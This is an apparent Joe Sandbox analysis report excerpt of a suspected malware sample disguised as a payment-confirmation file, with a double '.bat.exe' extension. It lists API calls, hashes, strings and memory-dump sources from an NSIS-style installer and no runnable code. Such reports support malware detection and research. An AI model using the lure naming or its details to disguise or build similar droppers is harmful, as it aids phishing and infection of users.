                                                            • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                            • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                            • GetTickCount.KERNEL32 ref: 0040306C
                                                            • wsprintfW.USER32 ref: 0040309A
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                              • Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,000025B1), ref: 0040302C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 722711167-2449383134
                                                            • Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                            • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                            • Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                            • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                            • GetMessagePos.USER32 ref: 00404FDF
                                                            • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                            • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                            • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                            APIs
                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                            • wsprintfW.USER32 ref: 00402FEA
                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                            • API String ID: 1451636040-1158693248
                                                            • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                            • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                            • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                            • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                            APIs
                                                              • Part of subcall function 6E3112BB: GlobalAlloc.KERNELBASE(00000040,?,6E3112DB,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112C5
                                                            • GlobalFree.KERNEL32(?), ref: 6E312743
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E312778
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 60e0ef9d0c479f1f7a6bf638784a61b8a012fc2d3f20d5b36447f6a4ce78d5f2
                                                            • Instruction ID: 421ac938bb8c22436da469afd32580aeea88b2a9848853268c8aab397decc8f9
                                                            • Opcode Fuzzy Hash: 60e0ef9d0c479f1f7a6bf638784a61b8a012fc2d3f20d5b36447f6a4ce78d5f2
                                                            • Instruction Fuzzy Hash: B431BE7150C601EFCB198FD5CA85CEBB7BEEB8B344325496CF14083661C7325806EB61
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                            • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                            • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                            • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                            • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                            APIs
                                                            • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                            • wsprintfW.USER32 ref: 00404F58
                                                            • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s$H/B
                                                            • API String ID: 3540041739-2222257793
                                                            • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                            • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                            • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                            • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FreeGlobal
                                                            • String ID:
                                                            • API String ID: 2979337801-0
                                                            • Opcode ID: 1b1ce722b8315936e4b94504a79954f3509af1dd268c760a9691c21f125da198
                                                            • Instruction ID: dba39ec0e30e6c542252e17ed32951274c3df816f53ff839fcb28062cef93d91
                                                            • Opcode Fuzzy Hash: 1b1ce722b8315936e4b94504a79954f3509af1dd268c760a9691c21f125da198
                                                            • Instruction Fuzzy Hash: C251E332D1C109AECB9C9FE9C4405EEBBBDEB65304F01C55ED400A3218F772AA4D87A1
                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E3125C2
                                                              • Part of subcall function 6E3112CC: lstrcpynW.KERNEL32(00000000,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112DC
                                                            • GlobalAlloc.KERNEL32(00000040), ref: 6E312548
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E312563
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 4216380887-0
                                                            • Opcode ID: 6cf2946bee49152452ef271ccba7443e13141583acff0f6124946af034cfca9d
                                                            • Instruction ID: fbe146d2d979fa15b238cc77bfc7bcbfa71301fc88809eeef9c13e47e51068af
                                                            • Opcode Fuzzy Hash: 6cf2946bee49152452ef271ccba7443e13141583acff0f6124946af034cfca9d
                                                            • Instruction Fuzzy Hash: 2941DCB000C705EFDB18DFA9E980AE6B7BCFB56304F10495DE48687580EB31A559EBB1
                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                            • GetClientRect.USER32(?,?), ref: 00401DEA
                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                            • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                            • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                            • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                            • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401E56
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                            • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                            • Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                            • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E3122D8,?,00000808), ref: 6E3116D5
                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E3122D8,?,00000808), ref: 6E3116DC
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E3122D8,?,00000808), ref: 6E3116F0
                                                            • GetProcAddress.KERNEL32(6E3122D8,00000000), ref: 6E3116F7
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E311700
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                            • String ID:
                                                            • API String ID: 1148316912-0
                                                            • Opcode ID: ec250e67548038f66a12e9ac0588a2bfc407a0330583f0abd8d7ae6aec0928d8
                                                            • Instruction ID: 50e561e91e0ae094389fca1eb60ed5808c443e6575c1f523bf323b8c24248a33
                                                            • Opcode Fuzzy Hash: ec250e67548038f66a12e9ac0588a2bfc407a0330583f0abd8d7ae6aec0928d8
                                                            • Instruction Fuzzy Hash: 90F037721065387FDA2016A79C4DCDBBE9CDF8B6F9B120369F718D219085614D02D7F1
                                                            APIs
                                                            • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 0040600A
                                                            • CharNextW.USER32(00000000), ref: 0040600F
                                                            • CharNextW.USER32(00000000), ref: 00406027
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 00405FFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CharNext
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
                                                            • API String ID: 3213498283-1847755183
                                                            • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                            • Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
                                                            • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                            • Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-823278215
                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                            • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                            • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6E311171
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6E3111E3
                                                            • GlobalFree.KERNEL32 ref: 6E31124A
                                                            • GlobalFree.KERNEL32(?), ref: 6E31129B
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E3112B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
